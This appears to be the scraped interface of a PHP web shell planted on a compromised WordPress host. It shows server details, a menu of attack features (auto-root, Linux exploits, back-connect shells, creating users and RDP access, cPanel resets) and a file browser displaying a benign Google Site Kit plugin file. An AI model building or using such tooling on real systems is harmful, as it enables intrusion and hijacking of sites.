Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.221.214.175
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Core /
Tags /
Guards /
[ HOME SHELL ]
Name
Size
Permission
Action
Tag_Environment_Type_Guard.php
1.13
KB
-rw-r--r--
Tag_Verify_Guard.php
1.13
KB
-rw-r--r--
WP_Query_404_Guard.php
764
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Tag_Environment_Type_Guard.php
<?php /** * Class Google\Site_Kit\Core\Tags\Guards\Tag_Environment_Type_Guard * * @package Google\Site_Kit\Core\Tags\Guards * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags\Guards; use Google\Site_Kit\Core\Guards\Guard_Interface; /** * Guard that verifies if we're in a production environment. * * @since 1.38.0 * @access private * @ignore */ class Tag_Environment_Type_Guard implements Guard_Interface { /** * Determines whether the guarded tag can be activated or not. * * @since 1.38.0 * * @return bool TRUE if guarded tag can be activated, otherwise FALSE. */ public function can_activate() { if ( ! function_exists( 'wp_get_environment_type' ) ) { return true; } $allowed_environments = apply_filters( 'googlesitekit_allowed_tag_environment_types', array( 'production' ) ); if ( ! is_array( $allowed_environments ) ) { $allowed_environments = array( 'production' ); } return in_array( wp_get_environment_type(), $allowed_environments, true ); } }
Close